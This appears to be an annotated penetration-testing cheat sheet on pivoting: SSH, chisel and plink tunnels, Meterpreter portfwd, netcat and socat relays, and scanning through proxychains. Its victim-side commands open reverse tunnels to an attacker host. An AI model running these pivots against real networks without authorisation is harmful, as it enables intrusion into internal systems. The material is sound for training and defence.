Port Forwarding
SSH
Local
Attacker > Victim
# -L [bind_address:]port:host:hostport: the ssh client listens on the local port and relays
# each connection through the SSH session to host:hostport, as resolved on the server side.
# Here local port 80 reaches 127.0.0.1:80 on 192.168.1.2. ssh forwards privileged local ports
# (below 1024) only for the superuser, and the server must permit forwarding (sshd AllowTcpForwarding).
ssh victim@192.168.1.2 -L 80:127.0.0.1:80 # one port
ssh victim@192.168.1.2 -L 80:127.0.0.1:80 -L 81:127.0.0.1:81 # several ports, one -L each
# sshpass -p passes the password as a command-line argument, so it can show up in the process
# list and in shell history; sshpass also accepts it from a file (-f) or the SSHPASS variable (-e).
sshpass -p 'P@ssW0rd123' ssh victim@192.168.1.2 -L 80:127.0.0.1:80 # password (one liner)
Remote
Victim > Attacker
service ssh start # run service (attacker machine)
# The ssh commands below run on the victim; in this section 192.168.1.2 is the attacker's SSH server.
# -R [bind_address:]port:host:hostport: the SSH server listens on port, and connections to it
# are relayed back through the session to host:hostport as seen from the client.
# By default sshd binds remote forwards to its loopback address only (see GatewayPorts), and it
# normally refuses privileged ports (below 1024) unless the login is root.
# NOTE(review): confirm port 80 is accepted for the `kali` login.
ssh kali@192.168.1.2 -R 80:127.0.0.1:80 # one port
ssh kali@192.168.1.2 -R 80:127.0.0.1:80 -R 81:127.0.0.1:81 # several ports, one -R each
# sshpass -p passes the password as a command-line argument, so it can show up in the process
# list and in shell history on the host where the command runs.
sshpass -p 'P@ssW0rd123' ssh kali@192.168.1.2 -R 80:127.0.0.1:80 # password (one liner)
Dynamic
Attacker > Victim
# -D [bind_address:]port: the ssh client opens a SOCKS proxy on local port 1080; connections
# made through it leave from the SSH server (192.168.1.2), subject to sshd AllowTcpForwarding.
ssh victim@192.168.1.2 -D 1080
# proxychains setup: install the package, edit its config, and point the proxy entry at the
# SOCKS listener opened above.
# apt install -y proxychains4
# nano /etc/proxychains4.conf
# socks5 127.0.0.1 1080
# proxychains -q suppresses its own output. It redirects only ordinary TCP connections, which is
# why nmap is run as a connect scan (-sT). 127.0.0.1 is resolved at the far end of the tunnel,
# so these commands reach the SSH server's loopback, not the local one.
proxychains -q nmap -sT -p- 127.0.0.1
proxychains -q curl http://127.0.0.1:80
Chisel
# The chisel server listens on port 1234 of the attacker machine; --reverse allows clients to
# request reverse (R:) forwards. The tunnel itself is carried over an HTTP connection to that port.
attacker@kali:~$ ./chisel server --reverse --port 1234
# R:80:127.0.0.1:80: the server listens on its port 80 and relays connections to 127.0.0.1:80
# on the client side. From the client host this appears as one outbound connection to 192.168.1.2:1234.
user@victim:~$ ./chisel client 192.168.1.2:1234 R:80:127.0.0.1:80 # one port
user@victim:~$ ./chisel client 192.168.1.2:1234 R:80:127.0.0.1:80 R:81:127.0.0.1:81 # several ports, one R: remote each
Dynamic
# Same server as in the port example: -p 1234 is the short form of --port 1234.
attacker@kali:~$ ./chisel server -p 1234 --reverse
# R:socks: the server opens a SOCKS5 listener (127.0.0.1:1080 by default) whose connections
# leave from the client host.
user@victim:~$ ./chisel client 192.168.1.2:1234 R:socks
# proxychains setup: install the package, edit its config, and point the proxy entry at the
# SOCKS listener on the chisel server.
# apt install -y proxychains4
# nano /etc/proxychains4.conf
# socks5 127.0.0.1 1080
# proxychains -q suppresses its own output. It redirects only ordinary TCP connections, which is
# why nmap is run as a connect scan (-sT). 127.0.0.1 is resolved at the far end of the tunnel,
# i.e. on the chisel client host.
proxychains -q nmap -sT -p- 127.0.0.1
proxychains -q curl http://127.0.0.1:80
Plink
Remote
Victim > Attacker
service ssh start # run service (attacker machine)
# plink is PuTTY's command-line SSH client, run here on the Windows victim; 192.168.1.2 is the attacker's SSH server.
# -l: login name. -pw: password, given on the command line and therefore visible in the process's command line.
# -R listen-port:host:port: the SSH server listens on listen-port and relays to host:port as seen from the plink side.
C:\>plink.exe -l kali -pw 123456 -R 445:127.0.0.1:445 192.168.1.2 # one port
C:\>plink.exe -l kali -pw 123456 -R 445:127.0.0.1:445 -R 8080:127.0.0.1:8080 192.168.1.2 # several ports, one -R each
C:\>plink.exe -l kali -pw 123456 -R 445:127.0.0.1:445 192.168.1.2 -P 1234 # -P: SSH server listens on port 1234 instead of 22
Metasploit
127.0.0.1:80 > 0.0.0.0:80
# Attach to the existing session with id 1.
msf6> sessions -i 1
# portfwd add: -l is the local port to listen on (on the Metasploit host), -r the remote host and
# -p the remote port to connect to; the connection to -r/-p is made from the session's host.
meterpreter> portfwd add -l 80 -p 80 -r 192.168.1.2
# Show the forwards currently registered on this session.
meterpreter> portfwd list
Netcat
127.0.0.1:80 > 0.0.0.0:1234
# Listens on port 1234 (-l -p 1234) and, through -c, runs `nc 127.0.0.1 80` for the incoming
# connection so that it is relayed to the local service; the while loop starts a new listener
# whenever nc exits. The -c option exists only in some netcat variants, and the meaning of the
# other flags also differs between variants. Verify against the installed nc.
# The relay adds no authentication or encryption: whoever can reach port 1234 reaches the service.
user@victim:~$ while true; do nc -nlktp 1234 -c "nc 127.0.0.1 80" ; done
Socat
127.0.0.1:80 > 0.0.0.0:1234
# TCP-LISTEN:1234 accepts connections on port 1234; reuseaddr lets the port be re-bound right
# after a restart; fork hands each connection to a child process so the listener keeps accepting.
# Each connection is relayed to TCP:127.0.0.1:80. The relay adds no authentication or
# encryption: whoever can reach port 1234 reaches the service.
user@victim:~$ socat TCP-LISTEN:1234,reuseaddr,fork TCP:127.0.0.1:80